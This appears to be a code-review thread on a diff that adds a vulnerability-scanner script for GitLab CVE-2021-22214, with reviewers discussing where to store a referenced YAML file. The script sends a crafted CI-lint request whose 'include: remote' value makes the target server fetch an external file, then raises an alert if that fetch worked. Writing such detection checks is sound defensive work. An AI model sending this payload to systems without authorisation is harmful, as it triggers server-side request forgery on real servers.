targeted/cve-2021-22214.js

```diff
@@ -0,0 +1,150 @@
+
+    // To check if script is running
+    logger("Testing Script against URL - " + url);
+
+    // Initiate the exploit
+    var exploitResponse = sendReq(msg);
+    // The HTTP Response Status Code
+    var status = exploitResponse.getResponseHeader().getStatusCode();
+    // The Content-Type Header
+    // It would ALWAYS be in JSON for the Gitlab Exploit
+    var ctype = exploitResponse.getResponseHeader().getHeader("Content-Type");
+    // The Response Body
+    var rebody = exploitResponse.getResponseBody().toString();
+    
+    // Checks to make sure that the response is by a Gitlab Instance
+    // on the server
+    // A unique term in the demo YAML file which will be present in
+    // the response body when the lint check succeeds
+    if (status === 200 && ctype === "application/json" && rebody.contains("CI_PIPELINE_SOURCE")) {
+        // risk: 0: info, 1: low, 2: medium, 3: high
+        // confidence: 0: falsePositive, 1: low, 2: medium, 3: high, 4: confirmed
+        var alertAttack = String(exploitResponse.getRequestBody().toString());
+        var alertEvidence = "CI_PIPELINE_SOURCE";
+        var otherInfo = "Presence of a unique term, [CI_PIPELINE_SOURCE] was detected in the response, which is part of the payload."
+        // Raise the alert
+        customAlert(
+            pluginid,
+            3,
+            3,
+            alertName,
+            alertDesc,
+            alertAttack,
+            alertEvidence,
+            otherInfo,
+            alertSol,
+            alertReference,
+            cweId,
+            wascId,
+            msg,
+            url
+        );
+    };
+    logger("Script run completed.");
+}
+
+/**
+ * Send a custom HTTP Request by manipulating the HttpMessage Object.
+ * 
+ * @param {Object.<HttpMessage>} msg - The HttpMessage Object being scanned
+ * @return {Object.<HttpMessage>}	 - The HTTP Response
+ */
+function sendReq(msg) {
+    // Modify the Request Header
+    var newReq = generateRequest(msg);
+    // Initiate the HttpSender
+    var sender = new org.parosproxy.paros.network.HttpSender(org.parosproxy.paros.model.Model.getSingleton().getOptionsParam().getConnectionParam(), true, 6);
+    // Fire the Request
+	sender.sendAndReceive(newReq);
+    // Debugging
+    // logger("Request Header -> " + newReq.getRequestHeader().toString())
+    // logger("Request Body -> " + newReq.getRequestBody().toString())
+    // logger("Response Header -> " + newReq.getResponseHeader().toString())
+    // logger("Raw Response Body -> " + newReq.getResponseBody().toString())
+	return newReq;
+}
+
+/**
+ * 
+ * @param {Object.<HttpMessage>} msg - The HttpMessage Object being scanned
+ * @returns {Object.<HttpMessage>}   - The HttpMessage with modified Request Header
+ */
+function generateRequest(msg) {
+    // The JSON Body Payload
+    var obj = {"include_merged_yaml": true, "content": "include:\n  remote: https://raw.githubusercontent.com/getastra/juice-shop/master/resources/cve-2021-22214.yml"}
```

Comment:
It would be better to include the file in this repository.

Reply:
Have added the file. However, one of the test seems to be failing. How can I resolve that?

Reply:
The file needs to be added to other directory, either top level of the repo or create another one (docs?).

Reply:
Have added the file to `resources` directory. I hope that's okay?

Reply:
`src/main/resources` I would expect (the path in the script needs to be updated accordingly).

Reply:
Updated.